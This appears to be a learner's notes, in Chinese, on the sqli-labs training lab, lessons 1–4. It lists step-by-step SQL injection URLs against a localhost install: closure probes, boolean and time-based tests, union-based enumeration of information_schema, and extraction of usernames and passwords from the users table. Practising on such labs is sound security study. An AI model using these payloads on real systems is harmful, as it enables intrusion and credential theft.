sqli-labs-master
Less01:字符型注入
http://127.0.0.1/sqli-labs-master/Less-1/?id=1
http://127.0.0.1/sqli-labs-master/Less-1/?id=2
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' and 1=2 --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' and sleep(5) --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=2' union select 1,2,3 --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-2' union select 1,2,3 --+
http://127.0.0.1/sqli-labs-master/Less-1/?id=-2' union select 1,version(),database() --+
//此时,已经获取到的信息有:数据库是security,版本信息:5.7.26
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
//得出了表名:emails,referers,uagents,users
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users' --+
//得出了users表的字段名,发现有username和password
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(0x5e,username,0x5c,password0x5e) from users --+
//获得了所有的账户和密码
只显示了2,3,说明只有2和3可以当注入。
数据库版本为5.7.26,数据库名为security。
security库的四个表:emails、referers、uagents、users
user的三个列:id、username、password
获得用户名及密码
Less02:数字型注入
http://127.0.0.1/sqli-labs-master/Less-2/?id=1
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=1 --+
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2 --+
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2 union select 1,2,3 --+
成功发现注入检测,后续注入手段与Less01类似
Less03:字符型注入
http://localhost/sqli-labs-master/Less-3/?id=1
http://localhost/sqli-labs-master/Less-3/?id=1'
//报错:near ''1'') ,可以认为")为闭合条件
http://localhost/sqli-labs-master/Less-3/?id=1') --+
http://localhost/sqli-labs-master/Less-3/?id=1') and 1=1 --+
http://localhost/sqli-labs-master/Less-3/?id=1') and 1=2 --+
http://localhost/sqli-labs-master/Less-3/?id=1') and 1=2 union select 1,2,3 --+
成功发现注入检测,后续注入手段与Less01类似
http://localhost/sqli-labs-master/Less-1/?id=2' union select 1,2,3 --+
http://localhost/sqli-labs-master/Less-1/?id=-2' union select 1,2,3 --+
http://localhost/sqli-labs-master/Less-1/?id=-2' union select 1,version(),database() --+
//此时,已经获取到的信息有:数据库是security,版本信息:5.7.26
http://1localhost/sqli-labs-master/Less-1/?id=-1' union select 1,version(),group_concat(table_name) from information_schema.tables where table_schema=database() --+
//得出了表名:emails,referers,uagents,users
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users' --+
//得出了users表的字段名,发现有username和password
http://localhost/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(username,password) from users --+
//获得了所有的账户和密码
Less04:字符型注入
http://localhost:8889/Less-4/
http://localhost/sqli-labs-master/Less-4/?id=1
http://localhost/sqli-labs-master/Less-4/?id=1'
http://localhost/sqli-labs-master/Less-4/?id=1"
//报错:near '"1"") ,可以认为")为闭合条件
http://localhost/sqli-labs-master/Less-4/?id=1") --+
http://localhost/sqli-labs-master/Less-4/?id=1") and 1=1 --+
http://localhost/sqli-labs-master/Less-4/?id=1") and 1=2 --+
http://localhost/sqli-labs-master/Less-4/?id=1") and 1=2 union select 1,2,3 --+
闭合检查成功,后续步骤同Less03